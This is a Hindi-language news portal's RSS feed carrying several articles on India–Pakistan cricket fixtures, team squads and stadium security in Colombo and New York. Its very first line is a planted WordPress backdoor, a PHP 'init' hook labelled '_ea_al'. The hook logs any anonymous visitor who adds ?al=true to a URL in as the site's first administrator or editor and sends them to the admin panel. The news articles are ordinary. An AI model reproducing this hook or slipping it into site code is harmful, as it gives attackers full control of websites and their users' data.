// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); India and Pakistan – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 15 Feb 2026 07:55:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 महामुकाबले से पहले कोलंबो अलर्ट मोड पर, चप्पे-चप्पे पर पुलिस का सख्त पहरा https://pratyushaashakinayikiran.com/?p=198034 Sun, 15 Feb 2026 07:55:00 +0000 https://pratyushaashakinayikiran.com/?p=198034 कोलंबो

भारत और पाकिस्तान के बीच रविवार को टी20 विश्व कप 2026 का महामुकाबला कोलंबो में खेला जाएगा। इस मैच के लिए श्रीलंका की राजधानी में सुरक्षा के पुख्ता इंतजाम किए गए हैं। पुलिस अधिकारियों के मुताबिक, कड़े पहरे के बीच परिंदा भी पर नहीं मार सकेगा।

विशेष ट्रैफिक और सुरक्षा व्यवस्था लागू
कोलंबो के आर. प्रेमदासा स्टेडियम में होने वाले इस हाई-वोल्टेज मुकाबले को लेकर श्रीलंका पुलिस ने विशेष ट्रैफिक और सुरक्षा व्यवस्था लागू करने की घोषणा की है। पुलिस प्रवक्ता एफ. टी. वूटलर ने शनिवार को बताया कि मैच के आयोजन को देखते हुए किसी भी तरह की चूक की गुंजाइश नहीं छोड़ी जाएगी।

पाकिस्तान ने किया था बहिष्कार का एलान
भारत और पाकिस्तान के बीच यह मुकाबला उस समय हो रहा है, जब पिछले कुछ हफ्तों से अनिश्चितता का माहौल बना हुआ था। पाकिस्तान की ओर से बांग्लादेश के समर्थन में मैच के बहिष्कार की घोषणा के बाद स्थिति तनावपूर्ण हो गई थी। मामले को सुलझाने के लिए अंतरराष्ट्रीय क्रिकेट परिषद (आईसीसी), बांग्लादेश, पाकिस्तान और श्रीलंका के बीच कई दौर की बातचीत हुई।

श्रीलंका सरकार ने की पहल और मामले को सुलझाने में निभाई भूमिका
श्रीलंका सरकार ने भी संभावित आर्थिक नुकसान को देखते हुए पाकिस्तान से रुख बदलने की अपील की थी। राष्ट्रपति अनुरा कुमारा दिसानायके ने पाकिस्तान के प्रधानमंत्री शाहबाज शरीफ से बातचीत कर टीम को कोलंबो भेजने का आग्रह किया था, ताकि टूर्नामेंट के सह-मेजबान के रूप में श्रीलंका की तैयारियों पर असर न पड़े।

]]>
भारत-पाक की धमाकेदार भिड़ंत 16 नवंबर को, भारतीय टीम में जितेश शर्मा को बनाया कप्तान https://pratyushaashakinayikiran.com/?p=189060 Tue, 04 Nov 2025 08:26:00 +0000 https://pratyushaashakinayikiran.com/?p=189060 नई दिल्ली
 सीनियर मेंस सिलेक्शन कमिटी ने कतर में होने वाले एशियन क्रिकेट काउंसिल के राइजिंग स्टार्स एशिया कप के लिए भारत ‘ए’ टीम का चयन किया है. यह टूर्नामेंट 14 से 23 नवंबर 2025 तक दोहा के वेस्ट एंड इंटरनेशनल क्रिकेट स्टेडियम में खेला जाएगा.

राइजिंग स्टार्स एशिया कप के लिए भारत ए की टीम: प्रियांश आर्य, वैभव सूर्यवंशी, नेहल वढेरा, नमन धीर (उपकप्तान), सूर्यांश शेडगे, जितेश शर्मा (कप्तान और विकेटकीपर) रमनदीप सिंह, हर्ष दुबे, आशुतोष शर्मा, यश ठाकुर, गुरजापनीत सिंह, विजय कुमार वैश्य, युद्धवीर सिंह चरक, अभिषेक पोरेल (विकेटकीपर) और सुयश शर्मा

स्टैंड-बाय खिलाड़ी: गुरनूर सिंह बराड़, कुमार कुशाग्र, तनुश कोटियन, समीर रिजवी और शेख रशीद.

16 नवंबर को भारत-पाक टक्कर, 23 को फाइनल
ग्रुप ए में अफगानिस्तान, बांग्लादेश, हांगकांग और श्रीलंका हैं, जबकि ग्रुप बी में भारत, ओमान, पाकिस्तान और यूएई को रखा गया है. भारत-पाकिस्तान के बीच हाईवोल्टेज मुकाबला 16 नवंबर को होगा. दोनों सेमीफाइनल एक ही दिन यानी 21 नवंबर को निपटा दिए जाएंगे. फाइनल मैच 23 नवंबर, रविवार को होगा.

सिर्फ एक ही बार जीत पाया है भारत
इस टूर्नामेंट को पहले एसीसी इमर्जिंग एशिया कप के नाम से जाना जाता था. इस टूर्नामेंट की शुरुआत साल 2013 में हुई थी. अब तक इसके छह एडिशन खेले जा चुके हैं. टूर्नामेंट की शुरुआत अंडर-23 के रूप में हुई थी और बाद में इसे ‘ए’ टीमों की प्रतियोगिता में बदल दिया गया. पाकिस्तान और श्रीलंका ने इसे दो-दो बार जीता है, जबकि भारत और अफगानिस्तान ने इसे एक-एक बार जीता है. 2024 में श्रीलंका को हराकर अफगानिस्तान डिफेंडिंग चैंपियन है.

अपनी मेन टीम के साथ उतरेगी तीन एसोसिएट
टी-20 फॉर्मेट में खेले जाने वाले इमर्जिंग एशिया कप में भारत-पाकिस्तान, श्रीलंका, बांग्लादेश, अफगानिस्तान की ‘ए’ टीम के अलावा तीन एसोसिएट टीम यानी हांगकांग, ओमान और यूएई अपनी मुख्य टीम लेकर उतरेगी.

]]>
इंडिया वर्सेस पाकिस्तान मैच को लेकर फैंस की दीवानगी हर तरफ देखने को मिलती है, वर्ल्ड चैंपियनशिप में भिड़ेंगे दिग्गज https://pratyushaashakinayikiran.com/?p=48781 Sat, 06 Jul 2024 19:47:00 +0000 https://pratyushaashakinayikiran.com/?p=48781 नई दिल्ली
इंडिया वर्सेस पाकिस्तान मैच को लेकर फैंस की दीवानगी हर तरफ देखने को मिलती है। किसी भी खेल में इन देशों की टीमें जब आमने-सामने होती हैं, तो मुकाबला काफी दिलचस्प हो जाता है। एक बार फिर फैंस को अपने चहेते खिलाड़ियों को खेलते देखना का मौका मिलने वाला है। दरअसल इंग्लैंड में वर्ल्ड चैंपियनशिप ऑफ लीजेंड्स 2024 खेली जा रही है, जिसमें कुल 6 टीमें हिस्सा ले रही हैं। शनिवार को इंडिया चैंपियंस और पाकिस्तान चैंपियंस के बीच हाईवोल्टेज मुकाबला होने जा रहा है, जिसके हाउसफुल होने की उम्मीद है।

इस मैच में भारत के पूर्व क्रिकेटर युवराज सिंह, सुरेश रैना, हरभजन सिंह, आरपी सिंह, इरफान पठान जैसे खिलाड़ी मौजूद रहेंगे। वहीं पाकिस्तान की ओर से शाहिद अफरीदी, यूनिस खान, शोएब मलिक, मिस्बाह उल हक मैच का हिस्सा होंगे। एजबेस्टन क्रिकेट ग्राउंड पर भारत और पाकिस्तान के बीच होने वाले बहुप्रतीक्षित विश्व चैंपियनशिप ऑफ लीजेंड्स मैच के लिए सभी 23000 सीटें बिक चुकी हैं। डब्ल्यूसीएल की आधिकारिक विज्ञप्ति के अनुसार 3 जुलाई को एजबेस्टन में शुरू हुई वर्ल्ड चैंपियनशिप ऑफ लीजेंड्स 18 जुलाई तक चलेगी।

इंडिया चैंपियंस के खिलाड़ी सुरेश रैना ने कहा, ''पाकिस्तान के साथ खेलना हमेशा सम्मान की बात होती है और कल का मैच भी कोई अपवाद नहीं है। मैदान पर हमारी टीम जोश से भरी हुई है और अपना बेस्ट देने के लिए तैयार है। हमें उम्मीद है कि हमारे प्रदर्शन से फैंस को गर्व महसूस होगा।''

पाकिस्तान चैंपियंस टीम के सदस्य यूनिस खान ने कहा, "हम इस प्रतिष्ठित टूर्नामेंट में भारत के साथ खेलने के लिए उत्साहित हैं। हमारे ग्रुप ने बहुत तैयारी की है और हमें यकीन है कि हम एक अद्भुत प्रदर्शन कर सकते हैं। हमारे लिए, यह खेल और हमारे देश दोनों के लिए गर्व और जुनून की बात है, यह सिर्फ एक खेल नहीं है।"
रोहित और विराट को कौन करेगा रिप्लेस? सहवाग ने जगजाहिर की 'मन की बात', T20 WC 2026 के प्लान पर भी बोले

टीमें:
भारत चैंपियन:
युवराज सिंह (कप्तान), हरभजन सिंह, सुरेश रैना, इरफान पठान, यूसुफ पठान, रॉबिन उथप्पा, अंबाती रायुडू, गुरकीरत मान, राहुल शर्मा, नमन ओझा, राहुल शुक्ला, आरपी सिंह, विनय कुमार, धवल कुलकर्णी, सौरभ तिवारी, अनुरीत सिंह, पवन नेगी

पाकिस्तान चैंपियन: शाहिद अफरीदी (कप्तान), शरजील खान, उमर अकमल, यूनिस खान, शोएब मलिक, मिस्बाह उल हक, अब्दुल रज्जाक, वहाब रियाज, सोहेल तनवीर, सोहेल खान, अब्दुल रहमान, आमिर यामीन, तौफीक उमर, शोएब मकसूद, यासिर अराफात, तनवीर अहमद।

 

]]>
आत्मविश्वास से लबरेज भारत और हार से बेजार पाकिस्तान के मुकाबले में पिच पर नजरें https://pratyushaashakinayikiran.com/?p=39387 Sun, 09 Jun 2024 11:06:00 +0000 https://pratyushaashakinayikiran.com/?p=39387 न्यूयॉर्क
आत्मविश्वास से ओतप्रोत और हालात के अनुकूल ढल चुकी भारतीय टीम नासाउ काउंटी की पेचीदा पिच पर टी20 विश्व कप के बहुचर्चित मुकाबले में रविवार को चिर प्रतिद्वंद्वी पाकिस्तान से भिड़ेगी जिसका मनोबल पहले ही मैच में मिली अप्रत्याशित हार ने तोड़ दिया है। टूर्नामेंट में सबसे ज्यादा भीड़ खींचने वाला मुकाबला 34000 दर्शक क्षमता वाले नासाउ काउंटी इंटरनेशनल स्टेडियम पर खेला जायेगा। इस मैदान की पिच लगातार चर्चा का विषय बनी हुई है। इसकी भारी आलोचना के बाद आईसीसी ने आधिकारिक रूप से इसे स्वीकार किया। अब तक इस स्टेडियम पर हुए तीन मैचों की छह पारियों में दो बार ही टीमें सौ रन के पार पहुंच सकी है। पूर्व क्रिकेटरों को तो यह भी लगता है कि कम स्कोर वाले मैचों से कैसे अमेरिकी बाजार में क्रिकेट का प्रचार प्रसार किया जायेगा।

एडीलेड ओवल के मैदानकर्मी डेमियन हाउज के मार्गदर्शन में अप्रैल में यहां चार ‘ड्रॉप इन’ पिचें बिछाई गई जो अभी तक जम नहीं पाई हैं। पिच से मिल रहा असमान उछाल बल्लेबाजों की सुरक्षा पर सवालिया ऊंगली उठा रहा है। भारतीय कप्तान रोहित शर्मा को आयरलैंड के खिलाफ मैच में कंधे में चोट लगी थी जिससे उन्हें मैदान छोड़ना पड़ा। रोहित ने मैच के बाद कहा था, ‘‘ईमानदारी से कहूं तो मुझे नहीं पता कि पिच से क्या अपेक्षा की जाये। हम हालात के अनुरूप तैयारी करेंगे। पाकिस्तान के खिलाफ मैच में हर खिलाड़ी को योगदान देना होगा।’’ भारत के मैच के एक दिन बाद आईसीसी को पिच को लेकर तमाम आशंकाओं के निवारण के लिये बयान जारी करना पड़ा।

पाकिस्तान टीम ने अभी तक नासाउ स्टेडियम पर खेला नहीं है। पहले मैच में अमेरिका से हारने वाली पाकिस्तानी टीम बृहस्पतिवार की रात ही यहां पहुंची है। उन्हें हालात के अनुरूप ढलने का मौका नहीं मिल सका है जिसका उन्हें नुकसान हो सकता है। भारत से हारने पर सुपर आठ चरण में उसके प्रवेश की राह लगभग असंभव हो जायेगी। आयरलैंड के खिलाफ भारत ने बायें हाथ के कलाई के स्पिनर कुलदीप यादव को नहीं उतारा और एक अतिरिक्त विशेषज्ञ तेज गेंदबाज को जगह दी गई। पाकिस्तान के खिलाफ भी यही संयोजन रहने की उम्मीद है क्योंकि मैच ऐसी टर्फ पर खेला जायेगा जो नयी है। दक्षिण अफ्रीका और नीदरलैंड अलग टर्फ पर आठ जून को खेल रहे हैं।

कुलदीप के मौजूदा फॉर्म और पाकिस्तानी बल्लेबाजों खासकर बाबर आजम के खिलाफ उनकी उपयोगिता को देखते हुए उन्हें उतारा जा सकता है। ऐसे में अक्षर पटेल या रविंद्र जडेजा में से एक को बाहर रहना होगा। बल्लेबाजी में रोहित और विराट कोहली पारी का आगाज करेंगे जबकि ऋषभ पंत तीसरे नंबर पर उतरेंगे। दूसरी ओर पाकिस्तान के सामने बड़ी चुनौती पहले मैच में मिली हार को भुलाने की है। अमेरिका के खिलाफ पहले मैच में सुपर ओवर में मिली हार ने एक बार फिर साबित कर दिया कि पाकिस्तान टीम इतनी अप्रत्याशित क्यो मानी जाती है। बाबर ने हार का ठीकरा गेंदबाजों पर फोड़ा लेकिन यह नहीं भूलना चाहिये कि बल्लेबाजों ने भी निराश किया। खुद बाबर ने 44 रन बनाने के लिये 43 गेंद खेल डाली।वैसे तेज गेंदबाजों की मददगार पिच पर शाहीन शाह अफरीदी की अगुवाई में पाकिस्तान का तेज आक्रमण कहर बरपाने का दम रखता है बशर्ते वे अपनी क्षमता के साथ न्याय करें। टूर्नामेंट की शुरूआत में आईएसआईएस से मिली आतंकी धमकी के बाद मैच की सुरक्षा के चाक चौबंद उपाय किये गए हैं।

नासाउ काउंटी के पुलिस कमिश्नर पैट्रिक राइडर ने हाल ही में सुरक्षा इंतजामात की जानकारी दी थी। उन्होंने कहा था, ‘‘भारत पाकिस्तान मैच के लिये सुरक्षा इंतजाम उसी तरह के हैं जब कुछ साल पहले तत्कालीन अमेरिकी राष्ट्रपति बराक ओबामा के स्वागत के लिये किये गए थे।’’

टीमें :
भारत:
रोहित शर्मा (कप्तान), हार्दिक पांड्या, यशस्वी जायसवाल, विराट कोहली, सूर्यकुमार यादव, ऋषभ पंत, संजू सैमसन, शिवम दुबे, रवींद्र जडेजा, अक्षर पटेल, कुलदीप यादव, युजवेंद्र चहल, अर्शदीप सिंह, जसप्रीत बुमराह, मोहम्मद सिराज।

पाकिस्तान: बाबर आजम (कप्तान), अबरार अहमद, आजम खान, फखर जमान, हारिस रऊफ, इफ्तिखार अहमद, इमाद वसीम, मोहम्मद अब्बास अफरीदी, मोहम्मद आमिर, मोहम्मद रिजवान, नसीम शाह, सैम अयूब, शादाब खान, शाहीन शाह अफरीदी, उस्मान खान।

मैच का समय : रात आठ बजे से।

 

]]>
आतंकी हमले की धमकी के बाद न्यूयॉर्क में भारत-पाक मुकाबले के लिए अभूतपूर्व सुरक्षा व्यवस्था https://pratyushaashakinayikiran.com/?p=35923 Thu, 30 May 2024 16:17:00 +0000 https://pratyushaashakinayikiran.com/?p=35923 न्यूयॉर्क
आतंकी हमले के खतरे को देखते हुए न्यूयॉर्क की नासाऊ काउंटी में नौ जून को भारत और पाकिस्तान के बीच होने वाले टी20 विश्व कप मुकाबले के लिए अभूतपूर्व सुरक्षा व्यवस्था होगी। राज्य की गवर्नर कैथी होचुल ने हालांकि जोर देकर कहा कि यह ‘इस बार’ खतरा विश्वसनीय नहीं है। नासाऊ काउंटी के आइसेनहावर पार्क स्टेडियम में टूर्नामेंट के आठ मैच खेले जाएंगे जिसमें भारत के तीन मैच भी शामिल हैं। भारतीय टीम एक जून को यहां बांग्लादेश के खिलाफ अभ्यास मैच भी खेलेगी। न्यूयॉर्क की गवर्नर कैथी ने कहा कि उन्होंने राज्य पुलिस को दर्शकों की सुरक्षा सुनिश्चित करने के लिए सुरक्षा इंतजाम बढ़ाने का निर्देश दिया है।

कैथी ने ‘एक्स’ पर एक पोस्ट में कहा, ‘‘विश्व कप की तैयारी में मेरी टीम संघीय और स्थानीय कानून प्रवर्तन एजेंसियों के साथ मिलकर काम कर रही है जिससे कि उपस्थित लोगों को सुरक्षित रखा जा सके। हालांकि इस समय कोई विश्वसनीय खतरा नहीं है, मैंने न्यूयॉर्क पुलिस को सुरक्षा इंतजाम बढ़ाने का निर्देश दिया है और हम निगरानी जारी रखेंगे।’’

मीडिया रिपोर्ट में कहा गया है कि न्यूयॉर्क के अधिकारी विश्व कप के खिलाफ ‘इस साल की शुरुआत में आतंकवादी समूह आईएसआईएस-के द्वारा वैश्विक धमकी के बाद’ सुरक्षा को लेकर सावधानी बरत रहे हैं। नासाउ काउंटी के पुलिस आयुक्त पैट्रिक राइडर ने बुधवार को कहा कि इस टूर्नामेंट को अप्रैल में आईएसआईएस-के से जुड़ी धमकी मिली थी। रिपोर्ट में कहा गया है, ‘‘इसके बाद नौ जून को होने वाले भारत बनाम पाकिस्तान मैच को लेकर और अधिक विशिष्ट धमकियां दी गईं और ऑनलाइन प्रसारित होने वाले एक वायरल वीडियो का संदर्भ दिया गया जिसमें ‘अकेले भेड़िये को कार्रवाई करने’ के लिए कहा गया है।’’

राइडर ने रिपोर्ट में कहा, ‘‘मैं आपको इसकी गारंटी दे सकता हूं। यह इस काउंटी के इतिहास में अब तक की सबसे बड़ी सुरक्षा व्यवस्था है, और मैं आपको यह भी गारंटी दे सकता हूं कि नौ जून को नासाउ काउंटी में सबसे सुरक्षित जगह स्टेडियम के अंदर होगी।’’ रोहित शर्मा की अगुआई वाली भारतीय टीम पांच जून को आयरलैंड के खिलाफ अपने टी20 विश्व कप अभियान की शुरुआत करेगी। उसके बाद नौ जून को पाकिस्तान के खिलाफ बहुप्रतीक्षित मुकाबला होगा। भारत को 12 जून को मेजबान अमेरिका का सामना करना है।

इस प्रतियोगिता पर आतंकी खतरे का खुलासा सबसे पहले त्रिनिदाद के प्रधानमंत्री कीथ रोली ने किया था और अंतरराष्ट्रीय क्रिकेट परिषद (आईसीसी) ने इस पर प्रतिक्रिया देते हुए कहा था कि प्रतियोगिता के सुचारू संचालन को सुनिश्चित करने के लिए मजबूत सुरक्षा घेरा बनाया गया है।

आईसीसी ने कहा था, ‘‘टूर्नामेंट में सभी की सुरक्षा हमारी पहली प्राथमिकता है और हमारे पास एक व्यापक और मजबूत सुरक्षा योजना है। हम अपने मेजबान देशों के अधिकारियों के साथ मिलकर काम करते हैं और वैश्विक परिदृश्य की निरंतर निगरानी और मूल्यांकन करते हैं ताकि यह सुनिश्चित किया जा सके कि हमारी प्रतियोगिता के लिए पहचाने गए किसी भी जोखिम को कम करने के लिए उचित योजनाएं बनाई गई हैं।’’

 

]]>